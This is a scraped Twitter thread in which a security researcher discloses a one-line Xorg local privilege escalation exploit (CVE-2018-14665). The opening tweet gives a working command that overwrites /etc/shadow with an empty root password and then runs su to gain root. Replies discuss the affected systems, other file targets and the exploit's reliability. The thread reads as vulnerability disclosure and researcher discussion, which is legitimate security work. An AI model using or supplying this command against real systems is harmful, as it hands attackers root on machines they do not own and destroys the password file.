Twitter | Search | |
Hacker Fantastic
-2018-14665 - a LPE exploit via fits in a tweet cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.
Reply Retweet Like More
Louis Dion-Marcil Oct 25
How? My arch's Xorg is not setuid root.
Reply Retweet Like
Hacker Fantastic Oct 25
It's setuid root on the proactive secure and many others.. looks like a great disturbance in the force is afoot this is a 2second local root type of attack... with pretty stable results.
Reply Retweet Like
Will Dormann Oct 25
XOrg on OpenBSD (I tested 6.3) definitely clobbers root-owned files with this technique. :-/
Reply Retweet Like
some person Oct 25
Replying to @hackerfantastic
I prefer to hit .preload as my target, leaves less mess IMO. Sample exploit:
Reply Retweet Like
Hacker Fantastic Oct 25
LPE exploit for 6.4 works fine for me, run from a console with no xenodm running should be find 6.3 too
Reply Retweet Like
Hacker Fantastic Oct 25
Replying to @info_dox
werd, you used the same technique in an earlier exploit against gnu-screen - I use that bug in my training, you are using the default shell (presumed bash) which drops privileges on most systems using your technique after the shell execve's. It's less reliable that way.
Reply Retweet Like
pwned4ever Oct 26
Replying to @hackerfantastic
Very nice 👍 awesome work once again
Reply Retweet Like
Hacker Fantastic Oct 26
Replying to @pwned4ever @nushinde
Bug found by - my contribution was noticing it's 0day status in OpenBSD and making PoC.
Reply Retweet Like
only root can do that Oct 26
Replying to @hackerfantastic
But an obvious hack, as shadow will be overwriten with rubbish that contains the X-Server log plus the line with the empty root password. So afterwards no other local account will work anymore...
Reply Retweet Like
Hacker Fantastic Oct 26
Replying to @devnull0000
the old file is backed up to /etc/shadow.old
Reply Retweet Like
only root can do that Oct 26
Replying to @hackerfantastic
how convinient :-) didnt discovered the backup. just let a testfile overwrite.
Reply Retweet Like
Hacker Fantastic Oct 26
Replying to @devnull0000
Yeah, lots of ways to use this bug. Overwrite and partial control of a file is so 1999.
Reply Retweet Like